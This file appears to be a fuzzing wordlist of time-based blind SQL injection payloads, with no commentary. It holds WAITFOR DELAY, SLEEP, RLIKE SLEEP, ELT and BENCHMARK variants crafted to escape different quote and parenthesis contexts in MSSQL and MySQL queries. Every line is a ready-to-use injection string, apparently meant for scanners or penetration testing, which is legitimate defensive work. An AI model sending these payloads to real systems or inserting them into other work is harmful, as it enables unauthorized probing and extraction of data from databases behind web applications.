;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--
1 waitfor delay '0:0:5'--
1' waitfor delay '0:0:5'--
1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (1337=1337
1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ('PBiy'='PBiy
) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (1337=1337
)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((1337=1337
))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((1337=1337
1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR `1`=`1
]-(SELECT 0 WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ('1337'='1337
')) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (('1337'='1337
'))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((('1337'='1337
' OR (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') OR (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) OR ('1337'='1337
')) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (('1337' LIKE '1337
'))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((('1337' LIKE '1337
%' OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337%'='1337
' OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337' LIKE '1337
") OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ("1337"="1337
")) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (("1337"="1337
"))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((("1337"="1337
" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR "1337"="1337
") OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ("1337" LIKE "1337
")) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (("1337" LIKE "1337
"))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((("1337" LIKE "1337
" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR "1337" LIKE "1337
' OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) OR ('1337'='1337
')) RLIKE SLEEP(5) OR (('1337'='1337
'))) RLIKE SLEEP(5) OR ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) OR (1337=1337
)) RLIKE SLEEP(5) OR ((1337=1337
))) RLIKE SLEEP(5) OR (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) OR '1337'='1337
') RLIKE SLEEP(5) OR ('1337' LIKE '1337
')) RLIKE SLEEP(5) OR (('1337' LIKE '1337
'))) RLIKE SLEEP(5) OR ((('1337' LIKE '1337
%' RLIKE SLEEP(5) OR '1337%'='1337
' RLIKE SLEEP(5) OR '1337' LIKE '1337
") RLIKE SLEEP(5) OR ("1337"="1337
")) RLIKE SLEEP(5) OR (("1337"="1337
"))) RLIKE SLEEP(5) OR ((("1337"="1337
" RLIKE SLEEP(5) OR "1337"="1337
") RLIKE SLEEP(5) OR ("1337" LIKE "1337
")) RLIKE SLEEP(5) OR (("1337" LIKE "1337
"))) RLIKE SLEEP(5) OR ((("1337" LIKE "1337
" RLIKE SLEEP(5) OR "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' OR ELT(1337=1337,SLEEP(5))--
' OR ELT(1337=1337,SLEEP(5))-- 1337
" OR ELT(1337=1337,SLEEP(5))-- 1337
') OR ELT(1337=1337,SLEEP(5))-- 1337
') OR ELT(1337=1337,SLEEP(5)) OR ('1337'='1337
')) OR ELT(1337=1337,SLEEP(5)) OR (('1337'='1337
'))) OR ELT(1337=1337,SLEEP(5)) OR ((('1337'='1337
' OR ELT(1337=1337,SLEEP(5)) OR '1337'='1337
') OR ELT(1337=1337,SLEEP(5)) OR ('1337' LIKE '1337
')) OR ELT(1337=1337,SLEEP(5)) OR (('1337' LIKE '1337
'))) OR ELT(1337=1337,SLEEP(5)) OR ((('1337' LIKE '1337
) OR ELT(1337=1337,SLEEP(5))-- 1337
) OR ELT(1337=1337,SLEEP(5)) OR (1337=1337
)) OR ELT(1337=1337,SLEEP(5)) OR ((1337=1337
))) OR ELT(1337=1337,SLEEP(5)) OR (((1337=1337
1 OR ELT(1337=1337,SLEEP(5))
1 OR ELT(1337=1337,SLEEP(5))-- 1337
1 OR ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` OR ELT(1337=1337,SLEEP(5)) OR `1`=`1
]-(SELECT 0 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))|[1
%' OR ELT(1337=1337,SLEEP(5)) OR '1337%'='1337
' OR ELT(1337=1337,SLEEP(5)) OR '1337' LIKE '1337
") OR ELT(1337=1337,SLEEP(5)) OR ("1337"="1337
")) OR ELT(1337=1337,SLEEP(5)) OR (("1337"="1337
"))) OR ELT(1337=1337,SLEEP(5)) OR ((("1337"="1337
" OR ELT(1337=1337,SLEEP(5)) OR "1337"="1337
") OR ELT(1337=1337,SLEEP(5)) OR ("1337" LIKE "1337
")) OR ELT(1337=1337,SLEEP(5)) OR (("1337" LIKE "1337
"))) OR ELT(1337=1337,SLEEP(5)) OR ((("1337" LIKE "1337
" OR ELT(1337=1337,SLEEP(5)) OR "1337" LIKE "1337
' OR ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 OR ELT(1337=1337,SLEEP(5))-- 1337
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" OR 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') OR =BENCHMARK(5000000,MD5(0x774c5341))--
') OR 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ('1337'='1337
')) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (('1337'='1337
'))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((('1337'='1337
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR '1337'='1337
') OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ('1337' LIKE '1337
')) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (('1337' LIKE '1337
'))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((('1337' LIKE '1337
%' OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR '1337%'='1337
' OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR '1337' LIKE '1337
") OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ("1337"="1337
")) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (("1337"="1337
"))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((("1337"="1337
" OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR "1337"="1337
") OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ("1337" LIKE "1337
")) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR (("1337" LIKE "1337
"))) OR 1337=BENCHMARK(5000000,MD5(0x774c5341)) OR ((("1337" LIKE "1337
" OR 1337=BENCHMARK(5000000,MD5(0x576e7a57)) OR "1337" LIKE "1337
' OR 1337=BENCHMARK(5000000,MD5(0x576e7a57)) OR '1337'='1337